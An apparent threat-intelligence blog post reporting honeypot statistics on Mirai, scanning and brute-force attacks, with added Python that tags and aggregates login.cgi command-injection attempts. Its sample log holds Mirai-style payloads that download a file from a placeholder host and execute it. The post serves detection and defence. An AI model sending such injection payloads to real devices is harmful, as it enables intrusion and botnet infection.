
Monitored Detected Enriched

2018-10-11 19:53

To keep enriching UnderAttack with data, we constantly monitor attackers in order to detect events as they happen.

Our engine also enriches and tags all of this detected data live, so that we can analyze it later.

Soon our portal will let you search our system and gather all of this information.

Here we report some of the information you will find on it; all data covers the period from 2018/8/1 to 2018/9/30. Enjoy!

Top tags

As mentioned, our tagging system recognizes behaviors and techniques and adds a tag to every detected event. Note that an event is often an aggregate of many detected attempts.

These are only the top 10 aggregated tags over the whole period; by narrowing the search to a specific time window you can obtain more precise information, which will be possible on our portal.

Below we focus on some of the tags you may find more interesting.

Mirai Botnet events

Port scanning events

Bruteforce events

What is the origin of these events?

Top scanning countries

Top Mirai Botnet countries

Top bruteforcing countries

As previously stated, UnderAttack distinguishes between occurrences and events: an event is often an aggregate of many attempts. It is therefore interesting to know how many unique IPs are part of these events:

Dropped files

We detected many attempts to make our systems download a malicious file; this is often a dropper that in turn downloads something worse. You can find analyses of these files on our portal. Here is some information on this kind of attack.
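As an added example (not the UnderAttack engine's own code), the Python below shows one way a honeypot pipeline can turn raw /login.cgi command-injection requests, like the Mirai dropper requests reported in this section, into tagged events: it percent-decodes the cli parameter, flags shell metacharacters, extracts the dropper URL, and then folds attempts into one event per dropper host while counting unique source IPs, the distinction between attempts, events and unique IPs made above. Log lines, addresses and tag names are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed honeypot log lines ("<source ip> <request path>"), not real data; RFC 5737 addresses.
SAMPLE_LOG = """\
198.51.100.7 /login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.10/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
198.51.100.7 /login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.10/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
203.0.113.5 /login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.10/k%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
203.0.113.9 /login.cgi?cli=admin
198.51.100.22 /index.html
"""

# Shell metacharacters that a legitimate login parameter never contains.
INJECTION = re.compile(r"[;|&`$]")
# A downloader invocation followed by the URL the payload is fetched from.
DROPPER_URL = re.compile(r"\b(?:wget|curl)\s+(?:-\w+\s+)*(https?://\S+)")

def analyze_request(path):
    """Return (tags, dropper_url) for one request path; ([], None) when nothing is suspicious."""
    url = urlsplit(path)
    if url.path != "/login.cgi":
        return [], None
    # Split the query by hand: ';' inside the value is part of the injected command, not a separator.
    cli = next((unquote(p[4:]) for p in url.query.split("&") if p.startswith("cli=")), "")
    tags = []
    if INJECTION.search(cli):
        tags.append("command-injection")
    match = DROPPER_URL.search(cli)
    dropper = match.group(1).rstrip("';") if match else None
    if dropper:
        tags.append("dropper")
    return tags, dropper

def aggregate(log_text):
    """Fold attempts into one event per dropper host, keeping the attempt count and unique source IPs."""
    events = defaultdict(lambda: {"attempts": 0, "ips": set(), "tags": set()})
    for line in log_text.splitlines():
        src_ip, path = line.split(" ", 1)
        tags, dropper = analyze_request(path)
        if not tags:
            continue
        key = urlsplit(dropper).hostname if dropper else "no-dropper"
        events[key]["attempts"] += 1
        events[key]["ips"].add(src_ip)
        events[key]["tags"].update(tags)
    return dict(events)
```

On the constructed log this yields a single event for the dropper host 192.0.2.10 with three attempts from two unique IPs, which is exactly the attempts-versus-unique-IPs gap the statistics above describe.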

Top dropper URI from Mirai Botnet


Top dropper IPs from Mirai Botnet


What’s next?

This was just a glimpse; more posts will follow with analysis and statistics, so don’t miss them!

Shortly we will release our portal, where you can find all of this and much more. Stay tuned for the announcement ;)